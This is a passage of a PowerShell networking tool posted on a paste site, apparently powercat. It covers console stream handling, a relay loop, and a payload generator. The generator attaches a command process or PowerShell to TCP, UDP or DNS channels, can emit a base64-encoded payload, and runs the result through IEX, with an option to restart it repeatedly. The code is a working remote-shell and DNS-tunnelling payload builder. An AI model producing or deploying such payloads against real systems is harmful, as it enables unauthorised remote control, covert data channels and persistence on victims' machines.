  666.           if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)}
  667.           $Data = $null
  668.         }
  669.         catch
  670.         {
  671.           Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
  672.         }
  673.       }
  674.     }
  675.     finally
  676.     {
  677.       try
  678.       {
  679.         Write-Verbose "Closing Stream 1..."
  680.         Stream1_Close $Stream1Vars
  681.       }
  682.       catch
  683.       {
  684.         Write-Verbose "Failed to close Stream 1"
  685.       }
  686.     }
  687.   }
  688.   ########## POWERSHELL FUNCTIONS ##########
  689.  
  690.   ########## CONSOLE FUNCTIONS ##########
  691.   function Setup_Console
  692.   {
  693.     param($FuncSetupVars)
  694.     $FuncVars = @{}
  695.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
  696.     $FuncVars["Output"] = $FuncSetupVars[0]
  697.     $FuncVars["OutputBytes"] = [byte[]]@()
  698.     $FuncVars["OutputString"] = ""
  699.     return $FuncVars
  700.   }
  701.   function ReadData_Console
  702.   {
  703.     param($FuncVars)
  704.     $Data = $null
  705.     if($Host.UI.RawUI.KeyAvailable)
  706.     {
  707.       $Data = $FuncVars["Encoding"].GetBytes((Read-Host) + "`n")
  708.     }
  709.     return $Data,$FuncVars
  710.   }
  711.   function WriteData_Console
  712.   {
  713.     param($Data,$FuncVars)
  714.     switch($FuncVars["Output"])
  715.     {
  716.       "Host" {Write-Host -n $FuncVars["Encoding"].GetString($Data)}
  717.       "String" {$FuncVars["OutputString"] += $FuncVars["Encoding"].GetString($Data)}
  718.       "Bytes" {$FuncVars["OutputBytes"] += $Data}
  719.     }
  720.     return $FuncVars
  721.   }
  722.   function Close_Console
  723.   {
  724.     param($FuncVars)
  725.     if($FuncVars["OutputString"] -ne ""){return $FuncVars["OutputString"]}
  726.     elseif($FuncVars["OutputBytes"] -ne @()){return $FuncVars["OutputBytes"]}
  727.     return
  728.   }
  729.   ########## CONSOLE FUNCTIONS ##########
  730.  
  731.   ########## MAIN FUNCTION ##########
  732.   function Main
  733.   {
  734.     param($Stream1SetupVars,$Stream2SetupVars)
  735.     try
  736.     {
  737.       [byte[]]$InputToWrite = @()
  738.       $Encoding = New-Object System.Text.AsciiEncoding
  739.       if($i -ne $null)
  740.       {
  741.         Write-Verbose "Input from -i detected..."
  742.         if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
  743.         elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
  744.         elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
  745.         else{Write-Host "Unrecognised input type." ; return}
  746.       }
  747.      
  748.       Write-Verbose "Setting up Stream 1..."
  749.       try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
  750.       catch{Write-Verbose "Stream 1 Setup Failure" ; return}
  751.      
  752.       Write-Verbose "Setting up Stream 2..."
  753.       try{$Stream2Vars = Stream2_Setup $Stream2SetupVars}
  754.       catch{Write-Verbose "Stream 2 Setup Failure" ; return}
  755.      
  756.       $Data = $null
  757.      
  758.       if($InputToWrite -ne @())
  759.       {
  760.         Write-Verbose "Writing input to Stream 1..."
  761.         try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
  762.         catch{Write-Host "Failed to write input to Stream 1" ; return}
  763.       }
  764.      
  765.       if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}
  766.      
  767.       Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
  768.       while($True)
  769.       {
  770.         try
  771.         {
  772.           $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars
  773.           if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
  774.           if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
  775.           $Data = $null
  776.         }
  777.         catch
  778.         {
  779.           Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
  780.         }
  781.        
  782.         try
  783.         {
  784.           $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
  785.           if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
  786.           if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars}
  787.           $Data = $null
  788.         }
  789.         catch
  790.         {
  791.           Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
  792.         }
  793.       }
  794.     }
  795.     finally
  796.     {
  797.       try
  798.       {
  799.         #Write-Verbose "Closing Stream 2..."
  800.         Stream2_Close $Stream2Vars
  801.       }
  802.       catch
  803.       {
  804.         Write-Verbose "Failed to close Stream 2"
  805.       }
  806.       try
  807.       {
  808.         #Write-Verbose "Closing Stream 1..."
  809.         Stream1_Close $Stream1Vars
  810.       }
  811.       catch
  812.       {
  813.         Write-Verbose "Failed to close Stream 1"
  814.       }
  815.     }
  816.   }
  817.   ########## MAIN FUNCTION ##########
  818.  
  819.   ########## GENERATE PAYLOAD ##########
  820.   if($u)
  821.   {
  822.     Write-Verbose "Set Stream 1: UDP"
  823.     $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
  824.     $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
  825.     $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
  826.     $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")    
  827.     if($l){$InvokeString = "Main @('',`$True,'$p','$t') "}
  828.     else{$InvokeString = "Main @('$c',`$False,'$p','$t') "}
  829.   }
  830.   elseif($dns -ne "")
  831.   {
  832.     Write-Verbose "Set Stream 1: DNS"
  833.     $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
  834.     $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
  835.     $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
  836.     $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
  837.     if($l){return "This feature is not available."}
  838.     else{$InvokeString = "Main @('$c','$p','$dns',$dnsft) "}
  839.   }
  840.   else
  841.   {
  842.     Write-Verbose "Set Stream 1: TCP"
  843.     $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
  844.     $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
  845.     $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
  846.     $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
  847.     if($l){$InvokeString = "Main @('',`$True,$p,$t) "}
  848.     else{$InvokeString = "Main @('$c',`$False,$p,$t) "}
  849.   }
  850.  
  851.   if($e -ne "")
  852.   {
  853.     Write-Verbose "Set Stream 2: Process"
  854.     $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_CMD} + "`n}`n`n")
  855.     $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_CMD} + "`n}`n`n")
  856.     $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_CMD} + "`n}`n`n")
  857.     $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_CMD} + "`n}`n`n")
  858.     $InvokeString += "@('$e')`n`n"
  859.   }
  860.   elseif($ep)
  861.   {
  862.     Write-Verbose "Set Stream 2: Powershell"
  863.     $InvokeString += "`n`n"
  864.   }
  865.   elseif($r -ne "")
  866.   {
  867.     if($r.split(":")[0].ToLower() -eq "udp")
  868.     {
  869.       Write-Verbose "Set Stream 2: UDP"
  870.       $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
  871.       $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
  872.       $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
  873.       $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")    
  874.       if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
  875.       elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
  876.       else{return "Bad relay format."}
  877.     }
  878.     if($r.split(":")[0].ToLower() -eq "dns")
  879.     {
  880.       Write-Verbose "Set Stream 2: DNS"
  881.       $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
  882.       $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
  883.       $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
  884.       $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
  885.       if($r.split(":").Count -eq 2){return "This feature is not available."}
  886.       elseif($r.split(":").Count -eq 4){$InvokeString += ("@('" + $r.split(":")[1] + "','" + $r.split(":")[2] + "','" + $r.split(":")[3] + "',$dnsft) ")}
  887.       else{return "Bad relay format."}
  888.     }
  889.     elseif($r.split(":")[0].ToLower() -eq "tcp")
  890.     {
  891.       Write-Verbose "Set Stream 2: TCP"
  892.       $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
  893.       $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
  894.       $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
  895.       $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
  896.       if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
  897.       elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
  898.       else{return "Bad relay format."}
  899.     }
  900.   }
  901.   else
  902.   {
  903.     Write-Verbose "Set Stream 2: Console"
  904.     $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_Console} + "`n}`n`n")
  905.     $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_Console} + "`n}`n`n")
  906.     $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_Console} + "`n}`n`n")
  907.     $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_Console} + "`n}`n`n")
  908.     $InvokeString += ("@('" + $o + "')")
  909.   }
  910.  
  911.   if($ep){$FunctionString += ("function Main`n{`n" + ${function:Main_Powershell} + "`n}`n`n")}
  912.   else{$FunctionString += ("function Main`n{`n" + ${function:Main} + "`n}`n`n")}
  913.   $InvokeString = ($FunctionString + $InvokeString)
  914.   ########## GENERATE PAYLOAD ##########
  915.  
  916.   ########## RETURN GENERATED PAYLOADS ##########
  917.   if($ge){Write-Verbose "Returning Encoded Payload..." ; return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($InvokeString))}
  918.   elseif($g){Write-Verbose "Returning Payload..." ; return $InvokeString}
  919.   ########## RETURN GENERATED PAYLOADS ##########
  920.  
  921.   ########## EXECUTION ##########
  922.   $Output = $null
  923.   try
  924.   {
  925.     if($rep)
  926.     {
  927.       while($True)
  928.       {
  929.         $Output += IEX $InvokeString
  930.         Start-Sleep -s 2
  931.         Write-Verbose "Repetition Enabled: Restarting..."
  932.       }
  933.     }
  934.     else
  935.     {
  936.       $Output += IEX $InvokeString
  937.     }
  938.   }
  939.   finally
  940.   {
  941.     if($Output -ne $null)
  942.     {
  943.       if($of -eq ""){$Output}
  944.       else{[io.file]::WriteAllBytes($of,$Output)}
  945.     }
  946.   }
  947.   ########## EXECUTION ##########
  948. }
Add Comment
Please, Sign In to add comment